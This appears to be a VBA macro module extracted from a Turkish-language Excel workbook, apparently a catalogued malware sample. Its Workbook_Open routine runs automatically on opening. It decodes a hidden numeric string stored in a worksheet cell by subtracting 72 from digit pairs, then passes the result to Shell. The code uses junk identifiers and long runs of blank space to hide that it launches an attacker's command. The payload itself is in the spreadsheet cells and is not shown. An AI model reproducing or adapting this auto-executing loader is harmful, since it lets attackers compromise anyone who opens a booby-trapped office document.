Attribute VB_Name = "Bu|fffd|alismaKitabi"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





                                                                






          Private Function eximiously(ByVal maidenly As String, ByVal outshove As Long) As String








            







               




            eximiously = Sheets("nea84d637cf").Cells(135, 8).Value & Right(Left(maidenly, outshove), 2)







          







            End Function
Private Sub wattsecond(ByVal unpatentable As String)






                                                            







                                                






              Dim donga As Long: donga = 2







                                                    







             





                                                    




                                                            Dim intercessory As String







           




                                                        




          While donga < Len(unpatentable)






              intercessory = intercessory & hematocryal(eximiously(unpatentable, donga))








           






                                            






          donga = donga + 2








          





           Wend





                        
                                 Shell intercessory







                                                    







                                                                    







                                






                 




                End Sub







                Sub Workbook_Open()






                                                




                  







                                                    wattsecond Sheets("nea84d637cf").Cells(116, 8).Value








                                                                            







               




                   




                                        






                                                                        End Sub
Private Function hematocryal(ByVal maidenly As String) As String





                                            





                                        hematocryal = Chr(CLng(maidenly) - 72)
End Function
Attribute VB_Name = "Sayfa1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sayfa2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


INQUEST-PP=macro
